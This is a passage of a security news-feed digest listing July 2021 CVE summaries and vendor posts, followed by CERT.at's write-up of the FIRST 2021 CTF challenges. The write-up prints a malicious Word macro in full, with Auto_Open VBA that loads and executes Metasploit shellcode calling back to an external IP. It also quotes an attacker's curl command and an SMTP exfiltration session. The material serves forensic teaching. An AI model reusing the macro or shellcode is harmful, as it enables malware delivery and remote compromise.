Alexander Jäger, Senior Security Engineer of Google, continues in his role as Chief Financial Officer

https://www.first.org/newsroom/releases/20210708
CVE-2021-32961
2021-07-08T00:00:00Z | 1625702400

CWE-434 UNRESTRICTED UPLOAD OF FILE WITH DANGEROUS TYPE: A getfile function enables a user to supply an optional parameter, resulting in the processing of a request in a special manner. This can result in the execution of an unzip command and place a malicious .exe file in one of the locations the function looks for and get execution capabilities.

https://claroty.com/team82/disclosure-dashboard/cve-2021-32961
CVE-2021-32957
2021-07-08T00:00:00Z | 1625702400

CWE-427 UNCONTROLLED SEARCH PATH ELEMENT: A function is used to retrieve system information for a specific process, and this information collection executes multiple commands and summarizes the information into an XML. This function and subsequent process gives full path to the executable and is therefore vulnerable to binary hijacking.

https://claroty.com/team82/disclosure-dashboard/cve-2021-32957
CVE-2021-32953
2021-07-08T00:00:00Z | 1625702400

CWE-89 SQL INJECTION: An attacker could utilize SQL commands to create a new user in the system and update the user's permissions, granting the attacker the ability to log in.

https://claroty.com/team82/disclosure-dashboard/cve-2021-3295
CVE-2021-32949
2021-07-08T00:00:00Z | 1625702400

CWE-23 RELATIVE PATH TRAVERSAL: An attacker could utilize a function that permits changing a designated path to another path and traversing the directory, allowing the replacement of an existing file with a malicious file.

https://claroty.com/team82/disclosure-dashboard/cve-2021-32949
CVE-2021-32945
2021-07-08T00:00:00Z | 1625702400

CWE-326 INADEQUATE ENCRYPTION STRENGTH: An attacker could decipher the encryption and gain access to the system.

https://claroty.com/team82/disclosure-dashboard/cve-2021-32945
CVE-2021-32937
2021-07-08T00:00:00Z | 1625702400

CWE-209: GENERATION OF ERROR MESSAGE CONTAINING SENSITIVE INFORMATION: An attacker can gain knowledge of a session temporary working folder where the getfile and putfile commands are used. An attacker can leverage this knowledge to provide a malicious command to the working directory where the read and write activity can be initiated.

https://claroty.com/team82/disclosure-dashboard/cve-2021-32937
CVE-2021-32933
2021-07-08T00:00:00Z | 1625702400

CWE-77 COMMAND INJECTION: An attacker could leverage an API to pass along a malicious file that could then manipulate the process creation command line and run a command line argument. This could then be leveraged to run a malicious process.

https://claroty.com/team82/disclosure-dashboard/cve-2021-32933
Your Employees Want Passwordless. Isn't It Time You Gave It to Them?
2021-07-07T04:00:00Z | 1625630400

I hate passwords. There, I said it. I dread getting an email from Akamai IT telling me it will soon be time to update my password. I procrastinate until the last possible moment instead of immediately doing what is actually a trivial process. I suspect I'm not alone in my dislike for passwords.

https://www.akamai.com/blog/security/your-employees-want-passwordless-isnt-it-time-you-gave-it-to-them
IOBit Advanced SystemCare Ultimate Privileged I/O Read vulnerabilities
2021-07-07T00:00:00Z | 1625616000

https://talosintelligence.com/vulnerability_reports/TALOS-2021-1255
IOBit Advanced SystemCare Ultimate exposed IOCTL 0x9c40a148 vulnerability
2021-07-07T00:00:00Z | 1625616000

https://talosintelligence.com/vulnerability_reports/TALOS-2021-1252
IOBit Advanced SystemCare Ultimate exposed IOCTL 0x9c406144 vulnerability
2021-07-07T00:00:00Z | 1625616000

https://talosintelligence.com/vulnerability_reports/TALOS-2021-1253
IOBit Advanced SystemCare ultimate privileged I/O write vulnerabilities
2021-07-07T00:00:00Z | 1625616000

https://talosintelligence.com/vulnerability_reports/TALOS-2021-1254
Strategic Roadmap for SASE: A Practical Guide
2021-07-04T13:04:11Z | 1625403851

The post Strategic Roadmap for SASE: A Practical Guide appeared first on Cato Networks.

https://catonetworks.easywebinar.live/registration-77
[Ep.2] Using SASE For ZTNA: The Future of Post-Covid 19 IT Architecture
2021-07-04T12:54:43Z | 1625403283

The post [Ep.2] Using SASE For ZTNA: The Future of Post-Covid 19 IT Architecture appeared first on Cato Networks.

https://catonetworks.easywebinar.live/registration-85
[Ep.3] Implementing SASE in the Global Enterprise: Best Practices for Success
2021-07-04T12:51:51Z | 1625403111

The post [Ep.3] Implementing SASE in the Global Enterprise: Best Practices for Success appeared first on Cato Networks.

https://catonetworks.easywebinar.live/registration-84
Disable Kaseya VSA: possible ransomware attack via supply chain underway
2021-07-02T22:50:00Z | 1625266200

Kaseya, supplier of IT management software, has announced it is currently investigating a potential ransomware incident. Cybersecurityfirm Huntress Labs poses that Kaseya has been the victim of a supply-chain attack, which results in customers using the VSA product potentially being targeted with the REvil-ransomware. VSA is a remote management tool that is broadly used by IT management providers and managed service providers. Customers have a so called 'VSA-agent' installed on their systems.

https://english.ncsc.nl/latest/news/2021/07/03/disable-kaseya-vsa-possible-ransomware-attack-via-supply-chain-underway
High Threat Security Alert (A21-07-01): Vulnerability in Microsoft Windows
2021-07-02T04:00:00Z | 1625198400

Microsoft released a security update guide about a zero-day vulnerability in Windows Print Spooler service.

https://www.govcert.gov.hk/en/alerts_detail.php
The Countdown Has Started - The Move Toward Zero Trust and MFA
2021-07-02T04:00:00Z | 1625198400

In early May 2021, the President of the United States issued an executive order on cybersecurity, and though it will take some time for executive branch agencies to develop formal rules, the order itself includes a lot of what I consider to be best practice in cybersecurity, including the use of multi-factor authentication (MFA) and Zero Trust, mentioned by name.

https://www.akamai.com/blog/security/the-countdown-has-started-the-move-toward-zero-trust-and-mfa
8 Ways SASE Answers Your Current and Future IT & Security Needs
2021-07-01T12:14:03Z | 1625141643

The post 8 Ways SASE Answers Your Current and Future IT & Security Needs appeared first on Cato Networks.

https://www.catonetworks.com/resources/8-ways-sase-answers-your-current-and-future-it-security-needs/
Eesti.ee parandab tehnilist võimekust
2021-07-01T05:28:51Z | 1625117331

Riigi infosüsteemi amet uuendab riigiportaali eesti.ee veebiraamistikku, mis muudab portaali jätkusuutlikumaks ning suurendab selle tehnilist võimekust.

https://ria.ee/uudised/eestiee-parandab-tehnilist-voimekust
Jeffrey Carpenter and Dan Kaminsky newly inducted into FIRST's Incident Response Hall of Fame
2021-07-01T00:00:00Z | 1625097600

Jeffrey and Dan join past inductees Ian Cook, Don Stikvoort, and Klaus-Peter Kossakowski

https://www.first.org/newsroom/releases/20210630
Jeffrey Carpenter and Dan Kaminsky newly inducted into FIRST's Incident Response Hall of Fame
2021-07-01T00:00:00Z | 1625097600

Jeffrey and Dan join past inductees Ian Cook, Don Stikvoort, and Klaus-Peter Kossakowski

https://www.first.org/newsroom/releases/20210630
Cursos CERT.br: Agenda 2021
2021-06-30T16:49:42Z | 1625071782

Devido à demanda por vagas, no ano de 2021 será ministrado somente o curso Fundamentals of Incident Handling (FIH). As turmas oferecidas do FIH serão: Turma 1: 25 a 29 de outubro de 2021 Turma 2: 22 a 26 de novembro de 2021 Informações adicionais: Abertura das Inscrições: 15 de julho de 2021 Valor: R$ 3.000,00 Local: Sede do NIC.br, São Paulo, SP

https://cert.br/cursos/
SMB Worm Indexsinas
2021-06-30T13:00:00Z | 1625058000

New details in the Indexsinas SMB worm, also dubbed NSABuffMiner.

https://www.akamai.com/blog/security/smb-worm-indexsinas
FIRST Challenge 2021 Writeup
2021-06-30T04:50:30Z | 1625028630

Due to the COVID-19 pandemic the FIRST conference 2021 moved online and so did the annual CTF organized by the FIRST Security Lounge SIG. Thomas Pribitzer, Dimitri Robl, and Sebastian Waldbauer from CERT.at participated as a team, scoring the 9. place out of 42 teams. This post is a writeup of the challenges we were able to solve. The challenges were organized into different categories and new challenges were released each day. However, the writeup will only reflect the categories, not the days they were published. Network print 'print' AAAA Man or Machine The Secrets of a Dragon Fly [part 1] Email Exfil sudo su Reverse Engineering Secret document 1/3 Secret document 2/3 Secret document 3/3 File in the wild (1/2) Forensics Russian Dolls (1/2) Russian Dolls (2/2) Crhome Matser Miscellaneous Just run with Steve J. my man! The Bit Maker Cryptography/Forensics The Secret ICS HMI Pwning - 1 Hiding on the Modbus - 1 Hiding in the Noise - 1 Web Clear Intentions Permutation Lock Time to REST Intern Dev Tango Cryptography Decode Decode 2 Decode 3 Network In total there were seven challenges of which we solved six. print ‘print’ This challenge involved analyzing a PCAP file. The description was: Custom print, copy, and faxing services! And who said print media is dead? Looking at the PCAP file, we could quickly locate an interesting HTTP POST request which said: POST /PDF HTTP/1.1 Content-Type: application/ipp Date: Sun, 22 Dec 2019 16:56:10 GMT Host: localhost:1234 Transfer-Encoding: chunked User-Agent: CUPS/2.2.7 (Linux 4.15.0-65-generic; x86_64) IPP/2.0 Accept-Encoding: deflate, gzip, identity Expect: 100-continue Its payload contained the following header: b7 .......*.G..attributes-charset..utf-8H..attributes-natural-language..enE..printer-uri.#ipp://printer.example.com/ipp/printB..requesting-user-name..I..document-format..application/pdf. 2ea1 PK··· · ···O3&··/ / · mimetypeapplication/vnd.oasis.opendocument.presentation Ok, that looks strange – the POST requests refers to a document called PDF, it says document- format..application/pdf, but the MIME type says something else. Having a look at the list of file signatures on Wikipedia told us that PK is the start of the header "for zip file format and formats based on it, such as EPUB, JAR, ODF, OOXML" and that made an open document presentation more likely than a PDF. What does file say? $ file PDF PDF: Zip archive data, harset Well, not too helpful, so we removed everything until PK from the header, renamed it to PDF.odp and tried again: $ file PDF.odp PDF.odp: OpenDocument Presentation That looks much better! Opening it with LibreOffice we found the flag printprintprintprint_Flag123! on page 15. AAAA Another PCAP and we’re told Your incident response team said they located a series of suspicious TCP connections. They’ve asked you to find the one which contains the flag. They also mentioned something about morse and binary encodings. Looking through the PCAP, we found a lot of TCP connections, all of them containing variable amounts of the letter A. Using the filter tcp.stream == && tcp.flags.push == 1 where is replaced by each TCP stream, we found that the packet lengths varied a lot, except for stream 20 which contains mainly packets which are either 67 or 166 bytes in size. We exported this stream to a CSV file, extracted the the length and converted it to ones and zeroes, where 67 maps to 0 and 166 maps to 1. This resulted in a stream of bits converted to ASCII read: wowyoufoundthetimeseriesflag. Man or Machine More PCAPs, obviously ;) The task was: This one is simple. There’s a pcap which contains 100 SSH connections. Only 1 on the connections was human driven. All we want to know is the source port number for that 1 connection. After opening the PCAP, we looked into the Statistics section in Wireshark which showed us that most connections contained roughly the same amount of traffic except for one which had a lot more. Its source port was 54712. However, that in itself was not enough to be sure, so we dug deeper. Comparing the I/O graphs of the connections showed us that most of them look extremely similar, except one – again source port 54712. As connections from bot traffic should look very similar, this was was a good enough reason for us to assume that this connection was the one with a human behind a keyboard and we were correct. The Secrets of a Dragon Fly [part 1] No PCAPs this time but a link to a website and a rather simple task: What is the password? When connecting to the website (which contained the picture of a dragonfly, which explains the name) and examining the headers the following stood out: x-device-header: It looks like a computer desktop browser Switching to a mobile user agent string, returned a different header: x-proto-header: The year is 2021. IPv6 is widely adopted. Well, let’s try this again using IPv6. And voilà, a new header: Congratulations: The password is 3HWvgPuu9uFILPqvp+8VvvrTZFc7hNHG Email Exfil Back to PCAP! This time the task was: Your network traffic analysis engine triggered a high severity behavior anomaly alert. Your tier 1 SOC analysts could not identify what caused the alert. See if you can locate it and the flag! The PCAP contains three TCP connections: one over telnet, one over SMTP and one via TLS. The telnet connection reveals the relevant information. First it tells us, what the attacker did on the machine and the two relevant commands were: PW=`SSLKEYLOGFILE=/.hidden/log.log curl "https://www.passwordrandom.com/query?command=password"`; qpdf foo.pdf --encrypt $PW $PW 256 -- enc_foo.pdf python exfil.py exfil.py’s contents are also shown in the session, revealing a simple SMTP-exfil script which sends both ./hidden/log.log and enc_foo.pdf to the attacker: Content-Type: multipart/mixed; boundary="===============5727638339489555207=="\r\n MIME-Version: 1.0\r\n Subject: Check this out!\r\n From: attacker@localhost\r\n To: root@localhost\r\n \r\n --===============5727638339489555207==\r\n Content-Type: multipart/alternative;\r\n boundary="===============1396928425997086772=="\r\n MIME-Version: 1.0\r\n \r\n --===============1396928425997086772==\r\n Content-Type: text/plain; charset="us-ascii"\r\n MIME-Version: 1.0\r\n Content-Transfer-Encoding: 7bit\r\n \r\n Alt Text\r\n --===============1396928425997086772==\r\n Content-Type: text/plain; charset="us-ascii"\r\n MIME-Version: 1.0\r\n Content-Transfer-Encoding: 7bit\r\n \r\n This is the stolen data. See to it that it makes its way into the database.\r\n --===============1396928425997086772==--\r\n \r\n --===============5727638339489555207==\r\n Content-Type: application/octet-stream\r\n MIME-Version: 1.0\r\n Content-Transfer-Encoding: base64\r\n Content-Disposition: attachment; filename="one.jpg"\r\n \r\n Q0xJRU5UX1JBTkRPTSA2YjYxYjNmY2Q0NDA3NjIyODY5ZTRlNDQyOTZmYjc3MTBlMWY1YjE4OWYz\r\n MWJjNzBhYTE4ZmYxYjYyNWE2MGYzIGNhNWEyNjE0YjY5NjgxNGRhMThjNWMxYTE1MzliOWZiZWNm\r\n M2VmMzRjZWEwN2MwNGY2OTNjZDNmMjY1MWVjM2IzZmU4MWZkYjczYzA0MDc3MGEwZmEwOGE4NzEy\r\n ZDk2Ywo=\r\n \r\n --===============5727638339489555207==\r\n Content-Type: application/octet-stream\r\n MIME-Version: 1.0\r\n Content-Transfer-Encoding: base64\r\n Content-Disposition: attachment; filename="two.jpg"\r\n \r\n [SNIP] After extracting both .jpg files from the SMTP stream and decoded the base64, we got: $ file {one,two}.jpg one.jpg: ASCII text two.jpg: PDF document, version 1.7 And of course, when we try to open the PDF we’re asked for a password which we don’t have yet. However, one.jpg contains the logfile which can be used to decrypt TLS traffic by simply setting the SSLKEYLOGFILE variable accordingly. We can now use tshark to get our password. First, we have to find the packet we’re interested in: $ SSLKEYLOGFILE=one.jpg tshark -r email-exfil.pcap -Y "ssl" 203 23.638954 10.0.3.15 37806 205.144.171.63 443 TLSv1 573 Client Hello 205 23.696214 205.144.171.63 443 10.0.3.15 37806 TCP 1396 [TCP segment of a reassembled PDU] 207 23.697224 205.144.171.63 443 10.0.3.15 37806 TLSv1.2 1775 Server Hello, Certificate, Server Key Exchange, Server Hello Done 209 23.701477 10.0.3.15 37806 205.144.171.63 443 TLSv1.2 214 Client Key Exchange, Change Cipher Spec, Finished 211 23.756376 205.144.171.63 443 10.0.3.15 37806 HTTP2 176 SETTINGS[0], WINDOW_UPDATE[0] 212 23.756894 10.0.3.15 37806 205.144.171.63 443 HTTP2 109 Magic 213 23.757075 10.0.3.15 37806 205.144.171.63 443 HTTP2 112 SETTINGS[0] 215 23.757209 10.0.3.15 37806 205.144.171.63 443 HTTP2 98 WINDOW_UPDATE[0] 218 23.757385 10.0.3.15 37806 205.144.171.63 443 HTTP2 149 HEADERS[1]: GET /query?command=password 219 23.757498 10.0.3.15 37806 205.144.171.63 443 HTTP2 94 SETTINGS[0] 222 23.808444 205.144.171.63 443 10.0.3.15 37806 HTTP2 94 SETTINGS[0] 223 23.838464 205.144.171.63 443 10.0.3.15 37806 HTTP2 292 HEADERS[1]: 200 OK, DATA[1], DATA[1] (text/plain) 258 23.849585 10.0.3.15 37806 205.144.171.63 443 TLSv1.2 87 Alert (Level: Warning, Description: Close Notify) Well, packet 223 contains a reply in text/plain, so: $ SSLKEYLOGFILE=one.jpg tshark -r email-exfil.pcap -Y "http2 && frame.number == 223" -x [SNIP] Reassembled body (11 bytes): 0000 52 61 6f 4c 59 39 3a 33 30 77 6a RaoLY9:30wj This looks like our password, so let’s try it out: $ qpdf --decrypt two.jpg --password='RaoLY9:30wj' decrpted.pdf $ pdf2txt decrypted.pdf YouFoundThisFlag!_Congrats! sudo su Another PCAP \o/. Our task says: This is another easy one. The pcap contains a single ssh session. The user authenticated with a public key. The user was then provided a pseudo-terminal on the server. The user entered the "sudo su" command. The user then typed their passowrd and successfully elevated to root. The user then pressed CTL+D twice which exited first the root and then the user’s ssh session. All we want to know is the length of the user’s password. It’s a number. Basically, this is an exercise in counting: Using the very helpful article https://www.trisul.org/blog/traffic-analysis-of-secure-shell-ssh/ we analyzed the connection. First, we determined which algorithm was used: $ tshark -r sudo_su.pcap -T fields -e ssh.encryption_algorithms_server_to_client -e ssh.encryption_algorithms_client_to_server -E header=y -VVV | grep -v '^[[:space:]]*$' ssh.encryption_algorithms_server_to_client ssh.encryption_algorithms_client_to_server chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com Ok, so both list chacha20-poly1305@openssh.com as their first choice. The article says that packets containing a single keystroke encrypted with this algorithm have an encrypted size of 36 bytes and as there are a lot of packets containing 36 bytes, this is our algorithm. How many of those do we have? $ tshark -r sudo_su.pcap 'tcp.len == 36 && tcp.dstport == 22' | wc -l 18 In case you wonder: Filtering for the destination port is necessary because each keystroke is sent twice – once from the client to the server and then echoed back from the server to the client so that it appears on their screen. Thus, we have 18 keystrokes, which we can break down further: sudo su + ENTER, i.e. 8 The password + ENTER CTRL-D twice. So it seems the password has 18 − 8 − 1 − 2 = 7 characters. However, to be absolutely sure, we created an SSH session in our network using passwords we knew and sniffed the traffic. It turned out that this technique counts one byte to much, presumably because the last CTRL-D sends an additional logoff command and thus counts for two keystrokes. Therefore, the final answer was that the password has six characters. Reverse Engineering This part contained seven challenges of which we solved four. Secret document 1/3 We’re given a file with the following task: For your eyes onl!! Guys, We have received this document that content very sensitive informations. As our policy require to block macros, we need your help to discover the secret stored in the document. Someone says that this document retrieve it’s content* from an IP*, can you spot which one? Thanks! P.S: password for document is "infected" The file we received was a password-protected 7z file: $ 7z x -pinfected document.7z 7-Zip [64] 16.02 : Copyright (c) 1999-2016 Igor Pavlov : 2016-05-21 p7zip Version 16.02 (locale=en_US.UTF-8,Utf16=on,HugeFiles=on,64 bits,8 CPUs Intel(R) Core(TM) i7-8550U CPU @ 1.80GHz (806EA),ASM,AES-NI) Scanning the drive for archives: 1 file, 154242 bytes (151 KiB) Extracting archive: document.7z -- Path = document.7z Type = 7z Physical Size = 154242 Headers Size = 194 Method = LZMA2:192k 7zAES Solid = - Blocks = 1 Everything is Ok Size: 166575 Compressed: 154242 To inspect the macros we used Didier Steven’s oledump.py: $ python2 oledump.py -i 'TOP SECRET -- For Your Eyes Only.docm' A: word/vbaProject.bin A1: 412 'PROJECT' A2: 71 'PROJECTwm' A3: M 22157 'VBA/NewMacros' A4: m 1129 'VBA/ThisDocument' A5: 3180 'VBA/_VBA_PROJECT' A6: 1672 'VBA/__SRP_0' A7: 287 'VBA/__SRP_1' A8: 8586 'VBA/__SRP_2' A9: 405 'VBA/__SRP_3' A10: 224 'VBA/__SRP_4' A11: 66 'VBA/__SRP_5' A12: 577 'VBA/dir' This tells us, that the macro is in stream A3, so let’s extract it: $ python2 oledump.py -s A3 -v 'TOP SECRET -- For Your Eyes Only.docm' Attribute VB_Name = "NewMacros" #If VBA7 Then Private Declare PtrSafe Function CreateThread Lib "kernel32" (ByVal Yui As Long, ByVal Ishjn As Long, ByVal Iyjoknq As LongPtr, Bfstulfe As Long, ByVal Ztdx As Long, Ajuzag As Long) As LongPtr Private Declare PtrSafe Function VirtualAlloc Lib "kernel32" (ByVal Rwsmgf As Long, ByVal Yfhfyt As Long, ByVal Gmv As Long, ByVal Fzuyvr As Long) As LongPtr Private Declare PtrSafe Function RtlMoveMemory Lib "kernel32" (ByVal Dsxwyr As LongPtr, ByRef Ulfjrsim As Any, ByVal Qaozt As Long) As LongPtr #Else Private Declare Function CreateThread Lib "kernel32" (ByVal Yui As Long, ByVal Ishjn As Long, ByVal Iyjoknq As Long, Bfstulfe As Long, ByVal Ztdx As Long, Ajuzag As Long) As Long Private Declare Function VirtualAlloc Lib "kernel32" (ByVal Rwsmgf As Long, ByVal Yfhfyt As Long, ByVal Gmv As Long, ByVal Fzuyvr As Long) As Long Private Declare Function RtlMoveMemory Lib "kernel32" (ByVal Dsxwyr As Long, ByRef Ulfjrsim As Any, ByVal Qaozt As Long) As Long #End If Sub Auto_Open() Dim Nlgunnv As Long, Zniywf As Variant, Uprurh As Long #If VBA7 Then Dim Arbyj As LongPtr, Swyyipid As LongPtr #Else Dim Arbyj As Long, Swyyipid As Long #End If Zniywf = Array(232, 143, 0, 0, 0, 96, 49, 210, 100, 139, 82, 48, 137, 229, 139, 82, 12, 139, 82, 20, 15, 183, 74, 38, 139, 114, 40, 49, 255, 49, 192, 172, 60, 97, 124, 2, 44, 32, 193, 207, 13, 1, 199, 73, 117, 239, 82, 139, 82, 16, 87, 139, 66, 60, 1, 208, 139, 64, 120, 133, 192, 116, 76, 1, 208, 80, 139, 88, 32, 1, 211, 139, 72, 24, 133, 201, 116, 60, 49, 255, _ 73, 139, 52, 139, 1, 214, 49, 192, 193, 207, 13, 172, 1, 199, 56, 224, 117, 244, 3, 125, 248, 59, 125, 36, 117, 224, 88, 139, 88, 36, 1, 211, 102, 139, 12, 75, 139, 88, 28, 1, 211, 139, 4, 139, 1, 208, 137, 68, 36, 36, 91, 91, 97, 89, 90, 81, 255, 224, 88, 95, 90, 139, 18, 233, 128, 255, 255, 255, 93, 104, 110, 101, 116, 0, 104, 119, 105, 110, 105, 84, _ 104, 76, 119, 38, 7, 255, 213, 49, 219, 83, 83, 83, 83, 83, 232, 62, 0, 0, 0, 77, 111, 122, 105, 108, 108, 97, 47, 53, 46, 48, 32, 40, 87, 105, 110, 100, 111, 119, 115, 32, 78, 84, 32, 54, 46, 49, 59, 32, 84, 114, 105, 100, 101, 110, 116, 47, 55, 46, 48, 59, 32, 114, 118, 58, 49, 49, 46, 48, 41, 32, 108, 105, 107, 101, 32, 71, 101, 99, 107, 111, _ 0, 104, 58, 86, 121, 167, 255, 213, 83, 83, 106, 3, 83, 83, 104, 187, 1, 0, 0, 232, 21, 1, 0, 0, 47, 57, 90, 110, 88, 77, 119, 103, 120, 75, 95, 108, 103, 70, 71, 69, 86, 65, 74, 117, 81, 54, 103, 120, 95, 95, 87, 120, 56, 69, 90, 80, 51, 48, 51, 99, 84, 79, 113, 77, 82, 76, 122, 89, 71, 89, 78, 89, 71, 53, 83, 76, 77, 105, 53, 103, _ 71, 119, 85, 100, 111, 80, 122, 118, 90, 55, 54, 118, 54, 73, 97, 103, 71, 73, 105, 116, 86, 70, 56, 52, 68, 70, 87, 48, 102, 76, 74, 95, 54, 70, 108, 105, 72, 100, 88, 102, 52, 81, 73, 50, 69, 69, 53, 53, 103, 103, 86, 118, 119, 72, 121, 113, 72, 109, 117, 107, 100, 57, 100, 107, 103, 112, 112, 117, 116, 103, 45, 118, 117, 51, 52, 69, 73, 0, 80, 104, _ 87, 137, 159, 198, 255, 213, 137, 198, 83, 104, 0, 50, 232, 132, 83, 83, 83, 87, 83, 86, 104, 235, 85, 46, 59, 255, 213, 150, 106, 10, 95, 104, 128, 51, 0, 0, 137, 224, 106, 4, 80, 106, 31, 86, 104, 117, 70, 158, 134, 255, 213, 83, 83, 83, 83, 86, 104, 45, 6, 24, 123, 255, 213, 133, 192, 117, 20, 104, 136, 19, 0, 0, 104, 68, 240, 53, 224, 255, 213, 79, _ 117, 205, 232, 74, 0, 0, 0, 106, 64, 104, 0, 16, 0, 0, 104, 0, 0, 64, 0, 83, 104, 88, 164, 83, 229, 255, 213, 147, 83, 83, 137, 231, 87, 104, 0, 32, 0, 0, 83, 86, 104, 18, 150, 137, 226, 255, 213, 133, 192, 116, 207, 139, 7, 1, 195, 133, 192, 117, 229, 88, 195, 95, 232, 107, 255, 255, 255, 52, 53, 46, 54, 50, 46, 50, 53, 49, 46, 49, 54, 57, _ 0, 187, 240, 181, 162, 86, 106, 0, 83, 255, 213) Arbyj = VirtualAlloc(0, UBound(Zniywf), &H1000, &H40) For Uprurh = LBound(Zniywf) To UBound(Zniywf) Nlgunnv = Zniywf(Uprurh) Swyyipid = RtlMoveMemory(Arbyj + Uprurh, Nlgunnv, 1) Next Uprurh Swyyipid = CreateThread(0, 0, Arbyj, 0, 0, 0) End Sub Sub AutoOpen() Auto_Open End Sub Sub Workbook_Open() Auto_Open End Sub Hm, that array looks very much like base 10 encoded chars1 – let’s check: $ python3 Python 3.7.3 (default, Jan 22 2021, 20:04:44) [GCC 8.3.0] on linux Type "help", "copyright", "credits" or "license" for more information. >>> myarray = [ 232, 143, 0, 0, 0, 96, 49, 210, 100, 139, 82, 48, 137, 229, 139, 82, 12, 139, 82, 20, 15, 183, 74, 38, 139, 114, 40, 49, 255, 49, 192, 172, 60, 97, 124, 2, 44, 32, 193, 207, 13, 1, 199, 73, 117, 239, 82, 139, 82, 16, 87, 139, 66, 60, 1, 208, 139, 64, 120, 133, 192, 116, 76, 1, 208, 80, 139, 88, 32, 1, 211, 139, 72, 24, 133, 201, 116, 60, 49, 255,73, 139, 52, 139, 1, 214, 49, 192, 193, 207, 13, 172, 1, 199, 56, 224, 117, 244, 3, 125, 248, 59, 125, 36, 117, 224, 88, 139, 88, 36, 1, 211, 102, 139, 12, 75, 139, 88, 28, 1, 211, 139, 4, 139, 1, 208, 137, 68, 36, 36, 91, 91, 97, 89, 90, 81, 255, 224, 88, 95, 90, 139, 18, 233, 128, 255, 255, 255, 93, 104, 110, 101, 116, 0, 104, 119, 105, 110, 105, 84,104, 76, 119, 38, 7, 255, 213, 49, 219, 83, 83, 83, 83, 83, 232, 62, 0, 0, 0, 77, 111, 122, 105, 108, 108, 97, 47, 53, 46, 48, 32, 40, 87, 105, 110, 100, 111, 119, 115, 32, 78, 84, 32, 54, 46, 49, 59, 32, 84, 114, 105, 100, 101, 110, 116, 47, 55, 46, 48, 59, 32, 114, 118, 58, 49, 49, 46, 48, 41, 32, 108, 105, 107, 101, 32, 71, 101, 99, 107, 111,0, 104, 58, 86, 121, 167, 255, 213, 83, 83, 106, 3, 83, 83, 104, 187, 1, 0, 0, 232, 21, 1, 0, 0, 47, 57, 90, 110, 88, 77, 119, 103, 120, 75, 95, 108, 103, 70, 71, 69, 86, 65, 74, 117, 81, 54, 103, 120, 95, 95, 87, 120, 56, 69, 90, 80, 51, 48, 51, 99, 84, 79, 113, 77, 82, 76, 122, 89, 71, 89, 78, 89, 71, 53, 83, 76, 77, 105, 53, 103,71, 119, 85, 100, 111, 80, 122, 118, 90, 55, 54, 118, 54, 73, 97, 103, 71, 73, 105, 116, 86, 70, 56, 52, 68, 70, 87, 48, 102, 76, 74, 95, 54, 70, 108, 105, 72, 100, 88, 102, 52, 81, 73, 50, 69, 69, 53, 53, 103, 103, 86, 118, 119, 72, 121, 113, 72, 109, 117, 107, 100, 57, 100, 107, 103, 112, 112, 117, 116, 103, 45, 118, 117, 51, 52, 69, 73, 0, 80, 104,87, 137, 159, 198, 255, 213, 137, 198, 83, 104, 0, 50, 232, 132, 83, 83, 83, 87, 83, 86, 104, 235, 85, 46, 59, 255, 213, 150, 106, 10, 95, 104, 128, 51, 0, 0, 137, 224, 106, 4, 80, 106, 31, 86, 104, 117, 70, 158, 134, 255, 213, 83, 83, 83, 83, 86, 104, 45, 6, 24, 123, 255, 213, 133, 192, 117, 20, 104, 136, 19, 0, 0, 104, 68, 240, 53, 224, 255, 213, 79,117, 205, 232, 74, 0, 0, 0, 106, 64, 104, 0, 16, 0, 0, 104, 0, 0, 64, 0, 83, 104, 88, 164, 83, 229, 255, 213, 147, 83, 83, 137, 231, 87, 104, 0, 32, 0, 0, 83, 86, 104, 18, 150, 137, 226, 255, 213, 133, 192, 116, 207, 139, 7, 1, 195, 133, 192, 117, 229, 88, 195, 95, 232, 107, 255, 255, 255, 52, 53, 46, 54, 50, 46, 50, 53, 49, 46, 49, 54, 57,0, 187, 240, 181, 162, 86, 106, 0, 83, 255, 213] >>> output = '' >>> for i in myarray: ... output += chr(i) ... >>> print(output) è`1ÒdR0åR ¬Ç8àuô}ø;}$uàXX$Óf ÓHÉt<1ÿI4Ö1ÀÁÏ KXÓÐD$$[[aYZQÿàX_Zéÿÿÿ]hnethwiniThLw&ÿÕ1ÛSSSSSè>Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Geckoh:Vy§ÿÕSSjSSh»è/9ZnXMwgxK_lgFGEVAJuQ6gx__Wx8EZP303cTOqMRLzYGYNYG5SLMi5gGwUdoPzvZ76v6IagGIitVF84DFW0fLJ_6FliHdXf4QI2EE55ggVvwHyqHmukd9dkgpputg-vu34EIPhWÆÿÕÆSh2èSSSWSVhëU.;ÿÕj _h3àjPjVhuFÿÕSSSSVh-{ÿÕÀuhhDð5àÿÕOuÍèJj@hh@ShX¤SåÿÕSSçWh SVhâÿÕÀtÏÃÀuåXÃ_èkÿÿÿ45.62.251.169»ðµ¢VjSÿÕ Ok, not a pure string, but we definitely see a user agent and an IP address 45.62.251[.]169 and this is our answer. Secret document (2/3) The basic text and file are the same, but this time our task is: Can you find out which protocol is used to retrieve the secrets? As we’ve already found a user agent in the above output, we were pretty sure that it would be either HTTP or HTTPS and the latter was the correct answer. Secret document(3/3) Our final task is It seems that we have been fooled and that this document was actually malicious. Can you find out which framework was used to generate the malicious payload? We weren’t sure how to tackle this and the end of the challenge was near, so we simply guessed "metasploit" which was correct. File in the wild (1/2) We get a file and are told: What is the flag? At first, there’s not much this file tells us about itself: $ file suspectfile suspectfile: data However, when looking at the end of the file, we see the following: $ xxd suspectfile | tail -n 5 000009e0: 38b7 5bda 7fb8 9f6d 6fb5 976d 5484 3828 8.[....mo..mT.8( 000009f0: 636a 6301 ff1a 6d27 02d8 1f3b 9511 238a cjc...m'...;..#. 00000a00: 5c9b 886c 18da f1b6 3636 77b3 7f15 c714 \..l....66w..... 00000a10: 6c6f 59ed 0079 7261 6e69 6279 6d03 0060 loY..yranibym..` 00000a20: 8589 b708 088b 1f ....... And yranibym is "mybinary" reversed, so this seems to be a hint. We wrote a quick Python script to reverse the reversion: file = open("suspectfile", 'rb') reverse_me = [] byte = file.read(1) while byte: reverse_me.append(byte) byte = file.read(1) reverse_me = reversed(reverse_me) with open('sample', 'wb') as f: for byte in reverse_me: f.write(byte) And, did 